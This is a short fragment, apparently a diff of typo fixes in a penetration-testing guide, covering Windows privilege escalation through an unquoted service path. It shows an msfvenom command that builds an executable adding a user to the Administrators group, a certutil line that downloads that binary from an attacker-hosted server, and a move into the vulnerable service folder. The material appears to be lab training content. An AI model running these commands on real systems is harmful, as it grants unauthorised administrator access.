Skip to content

 msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > common.exe

-2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
+2. Host the binary using Python HTTP server and transfer it with certutil:

-certutil -urlcache -f http://[IP-ADRESS]:8000/common.exe common.exe
+certutil -urlcache -f http://[IP-ADDRESS]:8000/common.exe common.exe

 move common.exe "C:\Program Files\Unquoted Path Service\"